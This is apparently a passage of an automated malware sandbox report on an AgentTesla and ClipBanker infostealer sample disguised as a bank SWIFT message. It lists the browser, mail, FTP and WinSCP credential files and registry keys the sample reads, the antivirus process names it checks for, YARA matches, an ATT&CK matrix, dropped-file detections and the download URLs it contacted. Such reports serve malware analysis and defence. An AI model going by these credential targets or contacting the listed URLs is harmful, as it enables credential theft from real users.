Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B1920C GetLocalTime,

4_2_02B1920C

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B1B78C GetVersionExA,

4_2_02B1B78C

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 11.0.neworigin.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2337075849.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2422352208.00000000026FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2337075849.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.4526973764.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2422352208.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 6564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 11.0.neworigin.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2337075849.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.4526973764.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2422352208.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 6564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 11.0.neworigin.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2337075849.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2422352208.00000000026FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2337075849.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.4526973764.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2422352208.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 6564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 Valid Accounts	1 Valid Accounts	1 Deobfuscate/Decode Files or Information	11 Input Capture	1 System Network Connections Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	1 Scheduled Task/Job	1 Access Token Manipulation	3 Obfuscated Files or Information	1 Credentials in Registry	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	21 Registry Run Keys / Startup Folder	311 Process Injection	1 Timestomp	NTDS	47 System Information Discovery	Distributed Component Object Model	11 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	1 Clipboard Data	123 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	21 Registry Run Keys / Startup Folder	311 Masquerading	Cached Domain Credentials	331 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Valid Accounts	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	151 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	151 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	311 Process Injection	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	18%	ReversingLabs	Win32.Trojan.Malcab

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\neworigin.exe	100%	Avira	TR/Spy.Gen8
C:\Users\user\AppData\Local\Temp\server_BTC.exe	100%	Avira	HEUR/AGEN.1311721
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Avira	W32/Infector.Gen
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	100%	Avira	HEUR/AGEN.1311721
C:\Users\user\AppData\Local\Temp\neworigin.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\server_BTC.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Wisrysxl.PIF	21%	ReversingLabs	Win32.Trojan.Generic
C:\Users\Public\Libraries\lxsyrsiW.pif	3%	ReversingLabs
C:\Users\Public\alpha.pif	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\neworigin.exe	82%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Local\Temp\server_BTC.exe	66%	ReversingLabs	ByteCode-MSIL.Infostealer.ClipBanker
C:\Users\user\AppData\Local\Temp\x.exe	21%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	66%	ReversingLabs	ByteCode-MSIL.Infostealer.ClipBanker

Source	Detection	Scanner	Label
https://gxe0.com/yak/233_Wisrysx	0%	Avira URL Cloud	safe
http://yadelphi.ruopen	0%	Avira URL Cloud	safe
https://gxe0.com/yak/233_WisrysxlfssC	0%	Avira URL Cloud	safe
http://s82.gocheapweb.com	0%	Avira URL Cloud	safe
https://gxe0.com/	0%	Avira URL Cloud	safe
